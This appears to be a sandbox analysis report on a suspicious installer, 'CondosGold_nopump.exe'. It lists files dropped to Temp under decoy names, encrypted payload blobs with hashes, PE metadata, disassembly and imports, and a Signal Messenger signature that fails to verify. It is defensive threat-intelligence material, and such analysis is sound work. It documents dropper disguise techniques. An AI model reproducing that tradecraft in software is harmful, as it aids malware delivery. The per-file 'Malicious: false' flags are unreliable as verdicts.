Process:	C:\Users\user\Desktop\CondosGold_nopump.exe
File Type:	Microsoft Cabinet archive data, 488838 bytes, 11 files, at 0x2c +A "Mrs" +A "Meters", ID 7453, number 1, 29 datablocks, 0x1 compression
Category:	dropped
Size (bytes):	488838
Entropy (8bit):	7.998562760673357
Encrypted:	true
SSDEEP:	12288:jTh0ZHzZ6HCnX8aJH1L34gO5a7EBx0Gr2Ridy:jTxHCX8gHJ34EoErB
MD5:	62B44863280E1CB88AB21293E8BEA0F5
SHA1:	4FC9446CB8F4A4135162809BA8BF6EB773879080
SHA-256:	5FE98335AFEF943933F4839521765B3325ABE9E1C3032577026481946BBE61C9
SHA-512:	C3882B8CC019FAF5804223D7E38D9129FE44B7933DC6F390AED0327B66BB4A794BDA424788C029E0C06798B0C851B7872F96493653844BF6791BBE135ECD8510
Malicious:	false
Preview:	MSCF.....u......,.................../........P.........Y9M .Mrs..L...P.....Y9M .Meters............Y9M .Panties..d........Y9M .Pst..@.........Y9M .Ethical..D...@.....Y9M .Copying...........Y9M .Sharon...........Y9M .Excuse......<.....Y9M .Casio....._......Y9M .Assessment....._......Y9M .Examinations..H.<.M..CK...`T..\|./...@...D...m..%\"..! ...].$...q.>......o.....Wim..<.....V.Sp7.. ........Ku.i.....3..&.......3g.9..s.......SF....s.p.i%..d?.9....y.t......e......s....L..Ckn"4>.\|.&R.W..s9.\....5.u.9_\\.....=..h.;.z..h/-.w......q.-......n:.......Q..a..z.._Z...$.-..].......+.....g....%Q...[O.=.....G.Ow..n... .( ...1C.!.....v..GU..../.Z.........?..:...+.m.........p..^.. .j.....8z...U.aw..!_............3d_:..s..w!T...l....b...Rd..J..3..=..M+DU..ZZ....G..z...XG......zO.61............<.B..._..{."...EE.Z.......!.5./MM.zK...M$..[.E....)..U.4.&"Fo.....K..j.O.....pk... ..I...E.^uC..y.U]e.&......!1..-.?]3.:b-..~.Q..69U..w^v.]PB....z9. eWM..s.R...{.

C:\Users\user\AppData\Local\Temp\Meters

Process:	C:\Windows\SysWOW64\extrac32.exe
File Type:	data
Category:	dropped
Size (bytes):	84992
Entropy (8bit):	5.129213502158536
Encrypted:	false
SSDEEP:	768:hsFxyLtVSQsbZgar3R/OWel3EYr8qcDP8WBosd0bHazf0Tye4Ur2+9:wxjgarB/5el3EYrDWyu0uZo2+9
MD5:	FAE8CAAB7BF628714BCDA7A14650C8A9
SHA1:	E99C919713DE03E4B0420678826699D962B05480
SHA-256:	F9602B60E6B34A44AF7AB43DA832E47956485D6E952B0FEFBA79BEC382F4158A
SHA-512:	141D0275651598F50FC3685D2C663FC37218DBCDC77A78F4529E61046196A09E128911379D75B2448E264E70F760DBC2DB3EDF0DB0D330921A6A605B274F45B8
Malicious:	false
Preview:	.".........................................................B...B.......B.......L..... .L.<.L.......M...................B.......M.................W.B.......B.....h.L.....x.L. .L.<.L.......M.................$.B..............................HB......HB..HB..........................FB.....9FB.CFB.@............GB..................................L.".........L.......L......................................=B..=B..........................>B..>B.......B.......L.......L.<.L.....(.M.................[EB..........................KB.-LB.............................FPB......PB.>PB..........................RB..............................SB.............................+hB..............................gB...........................B...B.........................E.B.Y.B...............................B.............................-.B.............................T.B...............................B...........B.........................A.B.............................[.B...............................B........

C:\Users\user\AppData\Local\Temp\Mrs

Process:	C:\Windows\SysWOW64\extrac32.exe
File Type:	data
Category:	dropped
Size (bytes):	86016
Entropy (8bit):	6.614133995903123
Encrypted:	false
SSDEEP:	1536:fP4Cxi8q0vQEcmFdni8yDGVFE5gOHu1CwCMIBZwneAJu7QnswIPumV3BxZxu6/sL:X4CE0Imbi80PtCZEMnVIPPBxT/sZ5
MD5:	D8384B26A2535C0417E7AA1087DC171D
SHA1:	A2BE1DCE8C974D3BA17E20845BC39969219728DD
SHA-256:	8916199C5C994EBA1CC99A8440D0836D87BC06AF203C68484E979FD3375B6ED8
SHA-512:	1FA573FAA54EC9DBBADC0462EADE5BCC869E6CC63CDA14DF22396AA3A5CD7E3B9E7922898AD9859CBFC8A90DA3F257CA07DDB3E8295D169B00711DAB86E2E36A
Malicious:	false
Preview:	.....E......E.L=J..E...u....E..]....E..]...P.].....I...Y..u..DA...."....E....M._3.^..X....]..U..QQSV.....Vh?....Q....E...YY..M......#.QQ..$f;.u7.I...HYY...w.VS.!....E.YY.c.E....CL.S......\$...$j.j..?.7M...U..E..........Dz.V..S.......E.YY.... u.S......\$...$j.j..=......^[..]..U..QQSV.....Vh?.......E...YY..M......#.QQ..$f;.u7...HYY...w.VS.h....E.YY.c.E....CL.S......\$...$j.j..?.~L...U..E..........Dz.V..S...#....E.YY.... u.S......\$...$j.j.......^[..].h.p....!M..7...j...!M..+...h......"M........."M...L.3...!M..."M...!M..."M...U..M...u..W?........._t..j.X]..!M...3.]..U..M...u..+?.........3t..j.X].."M...3.]..U..M...u...>..........t..j.X]..!M...3.]..U..E.V.....W.H..+......jd....._.._+.................^]..U....V.u...u..>..j.^.0.s....."...Wj......Y.}...u..m>..j.^.0.vs...3.O....E.M......\|.=@W..r.j.Z;.\|...=.&A.v..3>..j.^.0.......S.E..E..P.E.P.....].YYj..F...Q..P.u.S..i...F...Q.....J.+.E...}...E.u..p.J..V.3.@9Q.}.@9..\|.H.F.j.+....Q..P.V..w..7.i..j.....}.Y...j

C:\Users\user\AppData\Local\Temp\Panties

Process:	C:\Windows\SysWOW64\extrac32.exe
File Type:	data
Category:	dropped
Size (bytes):	202
Entropy (8bit):	4.7712205967826735
Encrypted:	false
SSDEEP:	3:P+uUqt/vllpfrYZcFTS9gXeF+X32ZpfW6MZCt7HINqCXjPYLEd:PCqjvVg3F+X32+hZCt7HSbY+
MD5:	8D7BEBE90D83C02282F2B37902D47609
SHA1:	8528721237432C9CB70956F3861A2FBF6AB174C5
SHA-256:	8AE79C5433BA0B1FEAF8CA4E4547BA0366BD4120A15CAABA853CC578931BA0C1
SHA-512:	47D963B1CDDD904E011CEC1D1A6521CB1C6FB5B5F762504AE5CCB3FE890CA1B0C6FB6A9F8CC9E6B6AA0FFA96D65CC0F1957411420C4BF4532AA30C89B054D6B6
Malicious:	false
Preview:	CERTAIN........................@...............................................!..L.!This program cannot be run in DOS mode....$.........;..h..h..hX;1h..hX;3hq..hX;2h..hr..h..h...i...h...i...h...

C:\Users\user\AppData\Local\Temp\Pst

Process:	C:\Windows\SysWOW64\extrac32.exe
File Type:	data
Category:	dropped
Size (bytes):	91136
Entropy (8bit):	6.372657761619245
Encrypted:	false
SSDEEP:	1536:N1/AD1EsdzVXnP94SGGLpRB6M28eFvMVpYhWoXElJUzdlDfFgQa8BpDzdZPp7p:NZg5PXPeiR6MKkjGWoUlJUPdgQa8Bp//
MD5:	82B9DE69C5590DC95D9AF421CE8AD0FE
SHA1:	5C8C50D6512C7E914B29E9A7FEDD32830ED43A28
SHA-256:	EE5B15E38E3BA19BA9249B794AB669A875137818CBC6E2AC9F1388D5FE574E39
SHA-512:	2FEC14247D7C6A6C060B8904A99C86D2B39A43E54C2384D3ED2D2D8C1921F8E0F40DB85374043CE4327AF19C14BB6BFF91E6DED3105CCAE8168849F02EBE9FDD
Malicious:	false
Preview:	i...h..Ch..h..Sh..h..h..hI..i...hI..i..hI.?h..h.Wh..hI..i..hRich..h........PE..L......b.........."...............................@..................................k....@...@.......@.........................\|....P..h............N..X&...0..tv...........................C..........@............................................text............................... ..`.rdata..............................@..@.data....p.......H..................@....rsrc...h....P......................@..@.reloc..tv...0...x..................@..B.........................................................................................................................................................................................................................................................................................................t.M.....hi'D......Y.hs'D......Y..r...hx'D......Y..\|X..h}'D......Y.Q.I...h.'D.....Y.0$M.Q.@..0$M.P.=B..h.'D.....Y...C..h.'D.....Y.....h.'D..}...Y..+O..h.'D..l...Y..!

C:\Users\user\AppData\Local\Temp\Relates

Process:	C:\Users\user\Desktop\CondosGold_nopump.exe
File Type:	data
Category:	dropped
Size (bytes):	63488
Entropy (8bit):	7.99729604423269
Encrypted:	true
SSDEEP:	1536:tEwfk7sA0/MJ4e8rzJwWKhKQumxniVK1G4XEpZfz:eqk7sA0UKmWKhFuwn3XXkZfz
MD5:	228B3CBA5D32E858E0CF61AEE28C2602
SHA1:	27FD03A6F2F60E9437C820EE56973B149BDE74FF
SHA-256:	66F2071971DA2660A980A358C665A81E0456054B7EF240CF02B5EFBF9495854C
SHA-512:	8153E2F43D5A1AE294D816378143AF7ACC291ABAB7ADABC3E326BB284B609E19A0FC2EBAC97A747612595E7CE2F94862893DB73299B1D489F3CD7F7B80A504DF
Malicious:	false
Preview:	..I0Ck.b.....E....a.I..IQ.....k%.[..~?1\|....6.}..7@...q.....A?...I...n..6H2.#?.....y..R.^O.F.5./...... a...k_:...s.nSa.6.G.....j[......\|.[.%+._m.].......es.....U....&U,n.DC.%...eos.G@.....5..\|p.Z....Jg.J.....%...n.I.~>.-....u..X..........S.. .w.o...8P..^^..n.S......I.^..+.....F.....h.=.d..=S..c.#niYz0..9j.V.d/..eS."2N,.rf..^q..GO.nH..}.%.E.0..?...Y.....1..G..Jl.&J%..`..........F.mE.x.h.....lI..<^..:.>.....D... ....JK...=....7.;<.U9s....E.."....X..-..R.-<N....V..g.5..O>.Yr.zA{ZG.. .p.6.U..#J.0...D.V>.....8.3s\|.fnw...C.. ..N.8.........b..Mv.y.5.\.3%...f.......P..i.....QN...N... ...F$.h9.ms........pE.(./AK~mq.`..}4...........9.......=tz..9,.3J.."............x...HRC.hS.k.uZ..6....{..#...,...jU.!I..2..........o..R.W.tI.N.40n..9.yW.a.......5..0J.P....V.,S.Q.W.Ao.9.....H.o....O..F:.U..K....A.TM.7..@Dze\|m....X..L(...w.....[....j..8(........!Q~.:...h.G.;..}.~.....F.T.j.fE....Gu...\|..g......,..n..q..W....+..r.!xD.NHR.....zT.1Vb..q.......

C:\Users\user\AppData\Local\Temp\Sharon

Process:	C:\Windows\SysWOW64\extrac32.exe
File Type:	data
Category:	dropped
Size (bytes):	72704
Entropy (8bit):	5.014947643275812
Encrypted:	false
SSDEEP:	384:Lu88888888888888888888888888888zv888888NfU84444QnooooooooooooooX:L/SGKAGWRqA60dTcR4qYnGfAHE9AS
MD5:	406DC257ECC2C7B7B85236291DD52401
SHA1:	44DD1450A357A6EE606D379E48447D69908C2FC5
SHA-256:	D7D3378ED777D309BEA183208DE1C1B283A15262B4D39D29FB5C5DF4D738A268
SHA-512:	9E91E16B65A080EF57B35C9B9FED182AC56A81226EFA19FC382755247547F800908586263B21B1B6176699416BAF841F6849B3C2E32BB4F4801E81B1B98443D4
Malicious:	false
Preview:	.....................................................r.r.................................................................r.r.....................................................................r.r.r.........................r.................r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r...............................................................................................r...............................................................................................r...................................!.....!.....!.!.!.!.!.j.j.............................................................................................................................................................................................................................................r.r.r.r.r...........................................................................................r...r.r.r.r.r...r.r............................................................

C:\Users\user\AppData\Local\Temp\Singapore

Process:	C:\Users\user\Desktop\CondosGold_nopump.exe
File Type:	data
Category:	dropped
Size (bytes):	72704
Entropy (8bit):	7.997249644835945
Encrypted:	true
SSDEEP:	1536:4AhTI6aca5io/Qi7keHqP41EPxrIm5GjoKS8Hv376A5iY+TdGCaSFfStLpdzugY:4ApI6La5B4iYeKg1aImE1P3uAcY+0AFv
MD5:	E7A35D1689F9E4DF278775799501706A
SHA1:	8C6DF65201F038A584D10847D42EAEE40CCC1642
SHA-256:	000545EA8097A390CB269326658782385D851C7C6E33354EBBE00F3879A7231F
SHA-512:	FD2BBB471AABA4BCFF75758CEAF26EA094804539775CCA4FCB60F869FE6DE32B6BDB76A35AFDADFD0C1213421334F14CB3D1E69376F51A77F7DB8F7FC814C2F1
Malicious:	false
Preview:	....]d.=....k.o..B.#.V.v..d..u...Eq...Z;........F...._}....b4h>...y....i...2bY......@...B.P......."._@.9..uK~....v).....kGp.."..x`p.6...SA.i..z...I....D....Yi.x..u_a..~....stD.%.b...+.B..k...~`..[+.Z..b.h:...4r_...4kXar..JT..G...P~.@.....c6w..wF&........Flm.j..!.jg.q....\|4+lX^.....\|IhA.tVl......J._.."p~{.j......v.Z!...;?.b.c.....K..v.......I..6.j).....T...O.[......]S....M.-.{'..,......+O..+.......;...Z!..3./..ok.\|QPG...\.~................?..K+0.......D.v.^...z."`...ox...g.43f......4{c..?x...DG).m..0.[...Bo.5..jm\|.._..0..Z.#S...G..{...x......L..;....0O.N..8e]...l...`~)?gHz\.9?9.....C.j#....H(%z4..%..qB...ZiV..=A....[...]13.:.Z.....C[...z.&@.cK.8(...U..)....n...@.Z%....".\|......+......G....E'uTx..:xyNjt.k.LB.,l..F.E~..h.;.Ep.sU...c.6.0..m..P..pS..3r.V.../......./.p!....gul.g.7....".KpS.....#.....1....J...g.....E.4.HK..lJ..LS...H}AU3!EA06M..s$.<.z..g....kC.R.....:!.)......@...F..k;!..u:.=..3............d.a.Mb...l.t.jxI..8.v...r.T.

C:\Users\user\AppData\Local\Temp\Trip

Process:	C:\Users\user\Desktop\CondosGold_nopump.exe
File Type:	data
Category:	dropped
Size (bytes):	41751
Entropy (8bit):	7.996473125333125
Encrypted:	true
SSDEEP:	768:575nVPIny09GJErMDDFtZBjugA+DO4rnC+I934JvHW5GMq8Hr:1NVPIT9G8MD/nugHDz7I9oJidHr
MD5:	F15AD1D41F690F4541BAE39F2B9FFFD3
SHA1:	49AF965BA99791BE68F143449532A0019EB24C95
SHA-256:	23011FF4E4AA99F55ED45256758D565C4AAFABAE1B5C5F77DBC1D98A0B4B90E5
SHA-512:	DCEA021626792075175E329C44252B499917EC164CE9838BA4024BD676A7A39E92C521630650D21D7BCF8BBEA355B1391FC8707D80ABA66D47757AB7CFE642EE
Malicious:	false
Preview:	B...j.."..Kx...&d..;Z.^E.o...Z\|........V....__..j.X<.e..z..N......p...<......I.].....y.z.qh....jb....E'.R..y.b...@.$.M<.a...L.y..2' ....{....A....s.+o.......SW.Hi.pxNcR.......:..q.#......]..0........(.v..m.u.A..,.........F...KQ-.......KK..6(.~......n...Br..D..r#..C.J..CTB..x..:.s.....P....[i9..p..`.H.J...+~.V...c.m...H;....2.k.J.3b.?_.1...i..:...3.......V...>.r.Z......F5..k.L.."4#sQ...T.`..N..%}......8..Gd.\.y...&!/..,...3........&.p...~.BB$..s-.D....6.)..>=z ..N. ...0.Y.q.s.:vH...IAS.K ..VQ.%.m_.:.......I..n..-$...3.~..2Ngm.KD}9.>...z..).bF,.V.>.y......W,.......7?..V6.C..bB.....`...bh.p....O.%...hg.....m....j.....I..U.7N.........e....+....(..Z.u...{...Ve...u...cZ.u.......P....fP..~<n..e.\J_.........?5...np.j.............nm;0. $..#I].Qk.....3.!.rl..\|...A.'!....P.x.Kc}..o..2;..q..X...W..jV..........1....U..{..P...........cK.9.-1..Qh.c0{..yP%.~D.E....^.L.pF..j.`y.W.go.Or.w?/...,..cOo..G.[........t.r...qS...%..g.0q.l..S.;..Rr0v=.gl.....ru.2.

C:\Users\user\AppData\Local\Temp\Vegetarian

Process:	C:\Users\user\Desktop\CondosGold_nopump.exe
File Type:	data
Category:	dropped
Size (bytes):	87040
Entropy (8bit):	7.99795896720847
Encrypted:	true
SSDEEP:	1536:ZDmSe/ID7sViTA+MDeps9s51zw6BllFmAldrvxntFMHBD4M2jt8B:ZaSeSAcA+M4Es5p9b2AldrvxngHB0zyB
MD5:	DD05ED191465579E96916C50A7CC7419
SHA1:	D2482A24757311976588F8D28DB830E6F5BD9DF5
SHA-256:	670ABCC677B35E21D6AE9EFA6F4094B2F13A0BFB82BCF82D0EC9994A6CE4D7EE
SHA-512:	57EAFFB89BB4E456198143F1CDC6C418CD579D8B4E50A8A1E1DF83E35DE5D76AC74F2666AC5B86D99DA36392C737BF6359D8B6EBD244D20F7C5EEA7FB7810371
Malicious:	false
Preview:	.}..U.[... u..Sex/.\|.o.....E/.g..{.....H....3.........&aC4....f..2A%....k...D...-...._d?O....A..IA.R.q...+.....Q..@.TC..2oO........k.......OG..?...{".F.HP...f.[....,...+..a..3.L0.$.....4..g.;,..\....eDy.....B.bA....L7..Qf..\...W..%....&....Z...:...W_.5..BgV..!f.qoMW.9a.Z....K.0..8.u.b...{..H\|7.}\.\|Y...-.qY.../...J........K.c......U.....r.p.........D....~...,+..v.A........d!..\....:]X....,.C..@z.T...tP.l^V.J...t.,ADt.ZI3 :.p.xM..q.<.Q......(..Z....Xy20.....i.....@..x...Kl..GZ..d.`..u0.)]E^...r..[.vmn...5.bp...#4\|5..H..O..D##+.....9...E...\.WN8..U..^F.`._...b..Q_.c..............$....JH..7.4.c.."3.%.....j...]..w..l'.Mg..=..........n..A.._.\....V.S:.............y...32..gX...+.^ ?.=\|....W....:.E.......L..<W.L.....d.f.>.v..Q..._...?#....Pt.v.D.Y......."4. ...>/H.yl.B.:..:V..55bP....~_...'.G).y.....r.9n...(_..9v"..}..f.Tk .eGG{.....MO.'.b...C.>T.H..X :R....w.....G['.. n..~w...!...>.K.zq.. ..\N.{.....D.3.,...O;..=Y`.fz....P....B..t..0-.

C:\Users\user\AppData\Local\Temp\Wings

Process:	C:\Users\user\Desktop\CondosGold_nopump.exe
File Type:	data
Category:	dropped
Size (bytes):	57344
Entropy (8bit):	7.996643836498878
Encrypted:	true
SSDEEP:	1536:8mOk69atKyiusHKun7++aobbFKv3AoJkfra9Yo00dC:8tk6KKbusq27cFvQQkm9YT
MD5:	7C8B6B59D68D7C48CD20B146BC8975FF
SHA1:	B54D2938C915D9331CB1CC1FA70221BFA6505756
SHA-256:	DD83E07857F67230562721745A62D2F0577ABDF56D896A5D89917D5AC112651D
SHA-512:	70FB87A1C94CB4339DA7A94C93B638F39B2FCAE18B40C4AB4006473F05D8E9B017CA322D83059A0E4725250907F7FFED20688ED77184E79045B8345CD192330A
Malicious:	false
Preview:	.T.,U.2.bW...,...O.7.J.?>.B/...A.h........?P.....E...G..LZ.{.m...Y(T....\|..1...e.~5b7...':.1.....+.r{5.V\.taw\4x.....`#...LQ....S6X`h..}_^e4.....\l.J.....s:wy9.AH+..I...n!....,.l[........p%m......,.#..{........C.7...th....v...?..\e.....<..0..!...Ufy.=.....z.V.6.?`E(.l]4..G?.2.....;L..^12.d.WU...g[...D?8...K.Q......].y.j...k....?S...Z....@.`.F.o...m..p.o..q.u....#.....t..@..G.p.7j.m.y.6..-u...V.....x...E..fk.HK.:.T.E.r..6..78I...C.LN.....wW.Axa..b.w.l.%....:...B...\|...+j\|...^.@.g7...?..!...X...0..^.$#.......s......P..=W...pk9...e..I..J.Z.M.r...../(..To...\|.....PDHhq.'..50..I.....c...?J..q....X~....d..1...@2j.Ui@...7.yc).f...L.......4...3ZP\|...n..7..J!Dxbs...2...%Yb....'.b-5........l..m=..D...3.:!.y.5;~.......Q.}..b.6.v.-....1cp.-.z.UB..Mm.'.,...Ao.). .Jr...H.l.T.k....t.mew.ma.....$......8TI....Z.x<...+.....L:.m.e....Ip....4...$...z~M~z.. ......,6e ..(7.4.&.0.....?...]Ft..>.7]..0T.l^+'mVp.v~.t ..>.{.4.X....4..B...1.:.s.,DcW.?.......A..

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.9591664571432705
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	CondosGold_nopump.exe
File size:	1'378'152 bytes
MD5:	412db12259a7d002a629959260898ea7
SHA1:	4a8a563c534c4399d2f2dec2575c6268c2cbe898
SHA256:	469fbee829e69894f23aa921e86480cfe18b116b873fedf03a9227ec1d57bb80
SHA512:	0edcc32a29f2d4cdb5afda89dfcce0681d093ea32a3c85bc1e34f7279e82facdbb922461a6a0c6e5976d0be3d7a2559b8e328f0e2464e94ba9090aae3af96e8f
SSDEEP:	24576:yeO8eaBw8wu2vlgPhX49nuMUvLap9HMdCVPPhoJF9SCHCsKKgHQ34d8fr4:YCBwRu2NgPh8uR+jlPhs3SCFgw34C4
TLSH:	3055334B4B90C85BF7D20E71696A103FCA3C9F7619E8F05B9315CDC9B121190AE6AB73
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A{.k...8...8...8.b<8...8.b,8...8...8...8...8...8..%8...8.."8...8Rich...8........PE..L.....GO.................t...x...B...8.....

File Icon


Icon Hash:	fee29bdadb9ac8c0

Static PE Info

General

Entrypoint:	0x4038af
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x4F47E2E4 [Fri Feb 24 19:20:04 2012 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	0
File Version Major:	5
File Version Minor:	0
Subsystem Version Major:	5
Subsystem Version Minor:	0
Import Hash:	be41bf7b8cc010b614bd36bbca606973

Authenticode Signature

Signature Valid:	false
Signature Issuer:	CN=GlobalSign GCC R45 EV CodeSigning CA 2020, O=GlobalSign nv-sa, C=BE
Signature Validation Error:	The digital signature of the object did not verify
Error Number:	-2146869232
Not Before, Not After	11/09/2024 21:33:41 12/09/2027 21:33:41
Subject Chain	CN="Signal Messenger, LLC", O="Signal Messenger, LLC", L=Mountain View, S=California, C=US, OID.1.3.6.1.4.1.311.60.2.1.2=Delaware, OID.1.3.6.1.4.1.311.60.2.1.3=US, SERIALNUMBER=6703101, OID.2.5.4.15=Private Organization
Version:	3
Thumbprint MD5:	D4E75D16F15BD3BC32ACDF4EAF83A59A
Thumbprint SHA-1:	8A5A56EFFDC462AE8A6CF732BB21E2541995BF36
Thumbprint SHA-256:	44DBAC9846A7E8F8EAE8BF0F9518B44FB86C257DD797742B767AF6ED1995AAF4
Serial:	4EF1C2D67B37517957F42E8D

Entrypoint Preview

Instruction
sub esp, 000002D4h
push ebx
push ebp
push esi
push edi
push 00000020h
xor ebp, ebp
pop esi
mov dword ptr [esp+18h], ebp
mov dword ptr [esp+10h], 0040A268h
mov dword ptr [esp+14h], ebp
call dword ptr [00409030h]
push 00008001h
call dword ptr [004090B4h]
push ebp
call dword ptr [004092C0h]
push 00000008h
mov dword ptr [0047EB98h], eax
call 00007FC0E86B04ABh
push ebp
push 000002B4h
mov dword ptr [0047EAB0h], eax
lea eax, dword ptr [esp+38h]
push eax
push ebp
push 0040A264h
call dword ptr [00409184h]
push 0040A24Ch
push 00476AA0h
call 00007FC0E86B018Dh
call dword ptr [004090B0h]
push eax
mov edi, 004CF0A0h
push edi
call 00007FC0E86B017Bh
push ebp
call dword ptr [00409134h]
cmp word ptr [004CF0A0h], 0022h
mov dword ptr [0047EAB8h], eax
mov eax, edi
jne 00007FC0E86ADA7Ah
push 00000022h
pop esi
mov eax, 004CF0A2h
push esi
push eax
call 00007FC0E86AFE51h
push eax
call dword ptr [00409260h]
mov esi, eax
mov dword ptr [esp+1Ch], esi
jmp 00007FC0E86ADB03h
push 00000020h
pop ebx
cmp ax, bx
jne 00007FC0E86ADA7Ah
add esi, 02h
cmp word ptr [esi], bx

Rich Headers

Programming Language:

[ C ] VS2008 SP1 build 30729
[IMP] VS2008 SP1 build 30729
[ C ] VS2010 SP1 build 40219
[RES] VS2010 SP1 build 40219
[LNK] VS2010 SP1 build 40219

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xac40	0xb4	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x100000	0x50b62	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x14d5f8	0x3170	.rsrc
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x86000	0x994	.ndata
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x9000	0x2d0	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x728c	0x7400	419d4e1be1ac35a5db9c47f553b27cea	False	0.6566540948275862	data	6.499708590628113	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x9000	0x2b6e	0x2c00	cca1ca3fbf99570f6de9b43ce767f368	False	0.3678977272727273	data	4.497932535153822	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xc000	0x72b9c	0x200	77f0839f8ebea31040e462523e1c770e	False	0.279296875	data	1.8049406284608531	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ndata	0x7f000	0x81000	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x100000	0x50b62	0x50c00	6f4c937d6aeb71c5ea3038160a438d00	False	0.9591053115325078	data	7.812086713491337	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x151000	0xfd6	0x1000	c5a18758c1d350e60be4b1b8c16003a4	False	0.5693359375	data	5.327989080156199	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0x1002c8	0x44b86	PNG image data, 512 x 512, 8-bit/color RGBA, non-interlaced	English	United States	0.9844783606534081
RT_ICON	0x144e50	0x5a3f	PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced	English	United States	0.9950655758992338
RT_ICON	0x14a890	0x1e71	PNG image data, 64 x 64, 8-bit/color RGBA, non-interlaced	English	United States	1.001411523161812
RT_ICON	0x14c704	0x2668	Device independent bitmap graphic, 48 x 96 x 32, image size 9792	English	United States	0.4736574450772986
RT_ICON	0x14ed6c	0x1128	Device independent bitmap graphic, 32 x 64 x 32, image size 4352	English	United States	0.5453096539162113
RT_ICON	0x14fe94	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1088	English	United States	0.6808510638297872
RT_DIALOG	0x1502fc	0x100	data	English	United States	0.5234375
RT_DIALOG	0x1503fc	0x11c	data	English	United States	0.6056338028169014
RT_DIALOG	0x150518	0x60	data	English	United States	0.7291666666666666
RT_GROUP_ICON	0x150578	0x5a	data	English	United States	0.7888888888888889
RT_VERSION	0x1505d4	0x2b8	COM executable for DOS	English	United States	0.49712643678160917
RT_MANIFEST	0x15088c	0x2d6	XML 1.0 document, ASCII text, with very long lines (726), with no line terminators	English	United States	0.5647382920110193

Imports

DLL	Import
KERNEL32.dll	SetFileTime, CompareFileTime, SearchPathW, GetShortPathNameW, GetFullPathNameW, MoveFileW, SetCurrentDirectoryW, GetFileAttributesW, GetLastError, CreateDirectoryW, SetFileAttributesW, Sleep, GetTickCount, GetFileSize, GetModuleFileNameW, GetCurrentProcess, CopyFileW, ExitProcess, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, SetErrorMode, lstrcpynA, CloseHandle, lstrcpynW, GetDiskFreeSpaceW, GlobalUnlock, GlobalLock, CreateThread, LoadLibraryW, CreateProcessW, lstrcmpiA, CreateFileW, GetTempFileNameW, lstrcatW, GetProcAddress, LoadLibraryA, GetModuleHandleA, OpenProcess, lstrcpyW, GetVersionExW, GetSystemDirectoryW, GetVersion, lstrcpyA, RemoveDirectoryW, lstrcmpA, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalAlloc, WaitForSingleObject, GetExitCodeProcess, GlobalFree, GetModuleHandleW, LoadLibraryExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, WideCharToMultiByte, lstrlenA, MulDiv, WriteFile, ReadFile, MultiByteToWideChar, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW, lstrlenW
